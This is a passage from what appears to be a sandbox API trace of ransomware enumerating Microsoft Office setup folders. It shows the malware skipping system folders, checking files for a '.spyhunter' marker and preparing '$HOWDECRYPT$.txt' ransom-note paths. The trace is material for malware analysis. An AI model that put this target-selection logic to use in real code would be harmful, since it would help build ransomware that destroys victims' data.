(HeapHandle=0x2c0000, Flags=0x8, Size=0x11c) returned 0x35e4f8 [0087.848] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x379b20, Size=0xad0) returned 0x379b20 [0087.848] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.848] lstrcmpiW (lpString1="OCT.CHM", lpString2="Windows") returned -1 [0087.848] lstrlenW (lpString="Windows") returned 7 [0087.848] lstrcmpiW (lpString1="OCT.CHM", lpString2="$Recycle.bin") returned 1 [0087.848] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.848] lstrcmpiW (lpString1="OCT.CHM", lpString2="System Volume Information") returned -1 [0087.848] lstrlenW (lpString="System Volume Information") returned 25 [0087.848] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 104 [0087.848] StrStrIW (lpFirst="OCT.CHM", lpSrch=".spyhunter") returned 0x0 [0087.848] lstrcmpW (lpString1="OCT.CHM", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.849] lstrcmpW (lpString1="OCT.CHM", lpString2="_uninstalling_.png") returned 1 [0087.849] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 104 [0087.849] GetProcessHeap () returned 0x2c0000 [0087.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x112) returned 0x35e620 [0087.849] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x379b20, Size=0xad8) returned 0x379b20 [0087.849] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.849] lstrcmpiW (lpString1="OfficeMUI.XML", lpString2="Windows") returned -1 [0087.849] lstrlenW (lpString="Windows") returned 7 [0087.849] lstrcmpiW (lpString1="OfficeMUI.XML", lpString2="$Recycle.bin") returned 1 [0087.849] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.849] lstrcmpiW (lpString1="OfficeMUI.XML", lpString2="System Volume Information") returned -1 [0087.849] lstrlenW (lpString="System Volume Information") returned 25 [0087.849] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 110 [0087.849] StrStrIW (lpFirst="OfficeMUI.XML", lpSrch=".spyhunter") returned 0x0 [0087.849] lstrcmpW (lpString1="OfficeMUI.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.849] lstrcmpW (lpString1="OfficeMUI.XML", lpString2="_uninstalling_.png") returned 1 [0087.849] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 110 [0087.849] GetProcessHeap () returned 0x2c0000 [0087.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11e) returned 0x35e740 [0087.849] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x379b20, Size=0xae0) returned 0x379b20 [0087.849] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.849] lstrcmpiW (lpString1="OfficeMUISet.XML", lpString2="Windows") returned -1 [0087.849] lstrlenW (lpString="Windows") returned 7 [0087.849] lstrcmpiW (lpString1="OfficeMUISet.XML", lpString2="$Recycle.bin") returned 1 [0087.849] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.849] lstrcmpiW (lpString1="OfficeMUISet.XML", lpString2="System Volume Information") returned -1 [0087.849] lstrlenW (lpString="System Volume Information") returned 25 [0087.850] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 113 [0087.850] StrStrIW (lpFirst="OfficeMUISet.XML", lpSrch=".spyhunter") returned 0x0 [0087.850] lstrcmpW (lpString1="OfficeMUISet.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.850] lstrcmpW (lpString1="OfficeMUISet.XML", lpString2="_uninstalling_.png") returned 1 [0087.850] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 113 [0087.850] GetProcessHeap () returned 0x2c0000 [0087.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x124) returned 0x35e868 [0087.850] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x379b20, Size=0xae8) returned 0x379b20 [0087.850] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.850] lstrcmpiW (lpString1="OSETUPUI.DLL", lpString2="Windows") returned -1 [0087.850] lstrlenW (lpString="Windows") returned 7 [0087.850] lstrcmpiW (lpString1="OSETUPUI.DLL", lpString2="$Recycle.bin") returned 1 [0087.850] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.850] lstrcmpiW (lpString1="OSETUPUI.DLL", lpString2="System Volume Information") returned -1 [0087.850] lstrlenW (lpString="System Volume Information") returned 25 [0087.850] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL") returned 109 [0087.850] StrStrIW (lpFirst="OSETUPUI.DLL", lpSrch=".spyhunter") returned 0x0 [0087.850] lstrcmpW (lpString1="OSETUPUI.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.850] lstrcmpW (lpString1="OSETUPUI.DLL", lpString2="_uninstalling_.png") returned 1 [0087.850] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL") returned 109 [0087.850] GetProcessHeap () returned 0x2c0000 [0087.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11c) returned 0x35e998 [0087.850] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x379b20, Size=0xaf0) returned 0x379b20 [0087.850] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.850] lstrcmpiW (lpString1="promointl.dll", lpString2="Windows") returned -1 [0087.851] lstrlenW (lpString="Windows") returned 7 [0087.851] lstrcmpiW (lpString1="promointl.dll", lpString2="$Recycle.bin") returned 1 [0087.851] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.851] lstrcmpiW (lpString1="promointl.dll", lpString2="System Volume Information") returned -1 [0087.851] lstrlenW (lpString="System Volume Information") returned 25 [0087.851] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll") returned 110 [0087.851] StrStrIW (lpFirst="promointl.dll", lpSrch=".spyhunter") returned 0x0 [0087.851] lstrcmpW (lpString1="promointl.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.851] lstrcmpW (lpString1="promointl.dll", lpString2="_uninstalling_.png") returned 1 [0087.851] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll") returned 110 [0087.851] GetProcessHeap () returned 0x2c0000 [0087.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11e) returned 0x35eac0 [0087.851] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x379b20, Size=0xaf8) returned 0x379b20 [0087.851] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.851] lstrcmpiW (lpString1="PSCONFIG.CHM", lpString2="Windows") returned -1 [0087.851] lstrlenW (lpString="Windows") returned 7 [0087.851] lstrcmpiW (lpString1="PSCONFIG.CHM", lpString2="$Recycle.bin") returned 1 [0087.851] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.851] lstrcmpiW (lpString1="PSCONFIG.CHM", lpString2="System Volume Information") returned -1 [0087.851] lstrlenW (lpString="System Volume Information") returned 25 [0087.851] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 109 [0087.851] StrStrIW (lpFirst="PSCONFIG.CHM", lpSrch=".spyhunter") returned 0x0 [0087.851] lstrcmpW (lpString1="PSCONFIG.CHM", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.851] lstrcmpW (lpString1="PSCONFIG.CHM", lpString2="_uninstalling_.png") returned 1 [0087.851] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 109 [0087.851] GetProcessHeap () returned 0x2c0000 [0087.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11c) returned 0x35ebe8 [0087.852] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x379b20, Size=0xb00) returned 0x379b20 [0087.852] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.852] lstrcmpiW (lpString1="PSS10O.CHM", lpString2="Windows") returned -1 [0087.852] lstrlenW (lpString="Windows") returned 7 [0087.852] lstrcmpiW (lpString1="PSS10O.CHM", lpString2="$Recycle.bin") returned 1 [0087.852] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.852] lstrcmpiW (lpString1="PSS10O.CHM", lpString2="System Volume Information") returned -1 [0087.852] lstrlenW (lpString="System Volume Information") returned 25 [0087.852] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 107 [0087.852] StrStrIW (lpFirst="PSS10O.CHM", lpSrch=".spyhunter") returned 0x0 [0087.852] lstrcmpW (lpString1="PSS10O.CHM", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.852] lstrcmpW (lpString1="PSS10O.CHM", lpString2="_uninstalling_.png") returned 1 [0087.852] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 107 [0087.852] GetProcessHeap () returned 0x2c0000 [0087.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x118) returned 0x35ed10 [0087.852] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x379b20, Size=0xb08) returned 0x379b20 [0087.852] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.852] lstrcmpiW (lpString1="PSS10R.CHM", lpString2="Windows") returned -1 [0087.852] lstrlenW (lpString="Windows") returned 7 [0087.852] lstrcmpiW (lpString1="PSS10R.CHM", lpString2="$Recycle.bin") returned 1 [0087.852] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.852] lstrcmpiW (lpString1="PSS10R.CHM", lpString2="System Volume Information") returned -1 [0087.852] lstrlenW (lpString="System Volume Information") returned 25 [0087.852] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 107 [0087.852] StrStrIW (lpFirst="PSS10R.CHM", lpSrch=".spyhunter") returned 0x0 [0087.853] lstrcmpW (lpString1="PSS10R.CHM", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.853] lstrcmpW (lpString1="PSS10R.CHM", lpString2="_uninstalling_.png") returned 1 [0087.853] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 107 [0087.853] GetProcessHeap () returned 0x2c0000 [0087.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x118) returned 0x37a630 [0087.853] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x379b20, Size=0xb10) returned 0x37a750 [0087.853] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.853] lstrcmpiW (lpString1="SETUP.CHM", lpString2="Windows") returned -1 [0087.853] lstrlenW (lpString="Windows") returned 7 [0087.853] lstrcmpiW (lpString1="SETUP.CHM", lpString2="$Recycle.bin") returned 1 [0087.853] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.853] lstrcmpiW (lpString1="SETUP.CHM", lpString2="System Volume Information") returned -1 [0087.853] lstrlenW (lpString="System Volume Information") returned 25 [0087.853] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 106 [0087.853] StrStrIW (lpFirst="SETUP.CHM", lpSrch=".spyhunter") returned 0x0 [0087.853] lstrcmpW (lpString1="SETUP.CHM", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.853] lstrcmpW (lpString1="SETUP.CHM", lpString2="_uninstalling_.png") returned 1 [0087.853] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 106 [0087.853] GetProcessHeap () returned 0x2c0000 [0087.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x116) returned 0x379b20 [0087.853] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb18) returned 0x37a750 [0087.853] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.853] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0087.853] lstrlenW (lpString="Windows") returned 7 [0087.853] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0087.853] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.854] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0087.854] lstrlenW (lpString="System Volume Information") returned 25 [0087.854] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 106 [0087.855] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0087.855] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.855] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0087.855] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 106 [0087.855] GetProcessHeap () returned 0x2c0000 [0087.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x116) returned 0x379c40 [0087.855] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb20) returned 0x37a750 [0087.855] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0087.855] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0087.856] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\$HOWDECRYPT$.txt") returned 113 [0087.856] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\$HOWDECRYPT$.txt") returned 113 [0087.856] GetProcessHeap () returned 0x2c0000 [0087.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x124) returned 0x379d60 [0087.856] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb28) returned 0x37a750 [0087.856] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.856] lstrcmpiW (lpString1="Office32.en-us", lpString2="Windows") returned -1 [0087.856] lstrlenW (lpString="Windows") returned 7 [0087.856] lstrcmpiW (lpString1="Office32.en-us", lpString2="$Recycle.bin") returned 1 [0087.856] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.856] lstrcmpiW (lpString1="Office32.en-us", lpString2="System Volume Information") returned -1 [0087.856] lstrlenW (lpString="System Volume Information") returned 25 [0087.856] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us") returned 98 [0087.856] lstrcmpW (lpString1="Office32.en-us", lpString2=".") returned 1 [0087.856] lstrcmpW (lpString1="Office32.en-us", lpString2="..") returned 1 [0087.856] GetProcessHeap () returned 0x2c0000 [0087.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0087.856] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\*") returned 100 [0087.856] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0087.858] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.858] lstrlenW (lpString="Windows") returned 7 [0087.858] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.858] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.858] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.858] lstrlenW (lpString="System Volume Information") returned 25 [0087.858] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\.") returned 100 [0087.859] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.859] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.859] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.859] lstrlenW (lpString="Windows") returned 7 [0087.859] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.859] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.859] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.859] lstrlenW (lpString="System Volume Information") returned 25 [0087.859] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\..") returned 101 [0087.859] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.859] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.859] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.859] lstrcmpiW (lpString1="Office32MUI.XML", lpString2="Windows") returned -1 [0087.859] lstrlenW (lpString="Windows") returned 7 [0087.859] lstrcmpiW (lpString1="Office32MUI.XML", lpString2="$Recycle.bin") returned 1 [0087.859] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.859] lstrcmpiW (lpString1="Office32MUI.XML", lpString2="System Volume Information") returned -1 [0087.859] lstrlenW (lpString="System Volume Information") returned 25 [0087.859] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 114 [0087.859] StrStrIW (lpFirst="Office32MUI.XML", lpSrch=".spyhunter") returned 0x0 [0087.859] lstrcmpW (lpString1="Office32MUI.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.859] lstrcmpW (lpString1="Office32MUI.XML", lpString2="_uninstalling_.png") returned 1 [0087.859] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 114 [0087.859] GetProcessHeap () returned 0x2c0000 [0087.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x126) returned 0x379e90 [0087.860] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb30) returned 0x37a750 [0087.860] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.860] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0087.860] lstrlenW (lpString="Windows") returned 7 [0087.860] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0087.860] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.860] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0087.860] lstrlenW (lpString="System Volume Information") returned 25 [0087.860] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 108 [0087.860] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0087.860] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.860] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0087.860] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 108 [0087.860] GetProcessHeap () returned 0x2c0000 [0087.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11a) returned 0x379fc0 [0087.860] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb38) returned 0x37a750 [0087.860] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0087.860] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0087.860] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\$HOWDECRYPT$.txt") returned 115 [0087.860] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\$HOWDECRYPT$.txt") returned 115 [0087.860] GetProcessHeap () returned 0x2c0000 [0087.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x128) returned 0x37a0e8 [0087.861] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb40) returned 0x37a750 [0087.861] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.861] lstrcmpiW (lpString1="Office32.WW", lpString2="Windows") returned -1 [0087.861] lstrlenW (lpString="Windows") returned 7 [0087.861] lstrcmpiW (lpString1="Office32.WW", lpString2="$Recycle.bin") returned 1 [0087.861] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.861] lstrcmpiW (lpString1="Office32.WW", lpString2="System Volume Information") returned -1 [0087.861] lstrlenW (lpString="System Volume Information") returned 25 [0087.861] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW") returned 95 [0087.861] lstrcmpW (lpString1="Office32.WW", lpString2=".") returned 1 [0087.861] lstrcmpW (lpString1="Office32.WW", lpString2="..") returned 1 [0087.861] GetProcessHeap () returned 0x2c0000 [0087.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0087.861] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\*") returned 97 [0087.861] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0087.891] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.891] lstrlenW (lpString="Windows") returned 7 [0087.891] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.891] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.891] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.891] lstrlenW (lpString="System Volume Information") returned 25 [0087.891] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\.") returned 97 [0087.891] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.891] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.891] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.892] lstrlenW (lpString="Windows") returned 7 [0087.892] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.892] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.892] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.892] lstrlenW (lpString="System Volume Information") returned 25 [0087.892] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\..") returned 98 [0087.892] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.892] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.892] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.892] lstrcmpiW (lpString1="Office32WW.XML", lpString2="Windows") returned -1 [0087.892] lstrlenW (lpString="Windows") returned 7 [0087.892] lstrcmpiW (lpString1="Office32WW.XML", lpString2="$Recycle.bin") returned 1 [0087.892] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.892] lstrcmpiW (lpString1="Office32WW.XML", lpString2="System Volume Information") returned -1 [0087.892] lstrlenW (lpString="System Volume Information") returned 25 [0087.892] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 110 [0087.892] StrStrIW (lpFirst="Office32WW.XML", lpSrch=".spyhunter") returned 0x0 [0087.892] lstrcmpW (lpString1="Office32WW.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.892] lstrcmpW (lpString1="Office32WW.XML", lpString2="_uninstalling_.png") returned 1 [0087.892] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 110 [0087.892] GetProcessHeap () returned 0x2c0000 [0087.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11e) returned 0x37a218 [0087.892] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x37a750, Size=0xb48) returned 0x37a750 [0087.892] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0087.892] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0087.893] wnsprintfW (in: 